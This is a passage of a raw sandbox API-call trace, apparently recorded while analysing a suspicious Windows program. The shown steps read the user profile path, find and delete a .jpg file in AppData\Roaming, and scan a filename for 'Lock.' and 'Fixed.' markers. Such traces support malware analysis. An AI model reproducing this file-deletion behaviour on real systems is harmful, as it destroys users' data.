hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.480] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0195.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/AX5eJBJ82y3.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg", lpFilePart=0x8bedfc*="AX5eJBJ82y3.jpg") returned 0x3d [0195.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0195.481] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ax5ejbj82y3.jpg")) returned 0x2020 [0195.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb17d7350, ftCreationTime.dwHighDateTime=0x1d4d237, ftLastAccessTime.dwLowDateTime=0x74f69c30, ftLastAccessTime.dwHighDateTime=0x1d4cb53, ftLastWriteTime.dwLowDateTime=0x74f69c30, ftLastWriteTime.dwHighDateTime=0x1d4cb53, nFileSizeHigh=0x0, nFileSizeLow=0x14d34, dwReserved0=0x8cf, dwReserved1=0x4, cFileName="AX5eJBJ82y3.jpg", cAlternateFileName="AX5EJB~1.JPG")) returned 0xaa57e0 [0195.481] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ax5ejbj82y3.jpg")) returned 1 [0195.483] FindNextFileW (in: hFindFile=0xaa57e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb17d7350, ftCreationTime.dwHighDateTime=0x1d4d237, ftLastAccessTime.dwLowDateTime=0x74f69c30, ftLastAccessTime.dwHighDateTime=0x1d4cb53, ftLastWriteTime.dwLowDateTime=0x74f69c30, ftLastWriteTime.dwHighDateTime=0x1d4cb53, nFileSizeHigh=0x0, nFileSizeLow=0x14d34, dwReserved0=0x8cf, dwReserved1=0x4, cFileName="AX5eJBJ82y3.jpg", cAlternateFileName="AX5EJB~1.JPG")) returned 0 [0195.483] FindClose (in: hFindFile=0xaa57e0 | out: hFindFile=0xaa57e0) returned 1 [0195.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.483] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0195.484] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.484] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0195.486] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/AX5eJBJ82y3.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg", lpFilePart=0x8bf658*="AX5eJBJ82y3.jpg") returned 0x3d [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0195.486] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AX5eJBJ82y3.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ax5ejbj82y3.jpg")) returned 0xffffffff [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0195.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bXPQ0g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XPQ0g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PQ0g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kO FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FpGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GH2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MH.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.488] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bXPQ0g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XPQ0g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PQ0g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kO FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FpGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GH2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MH.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.489] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0195.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0195.489] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0195.489] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.490] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0195.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.490] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0195.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0195.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.491] 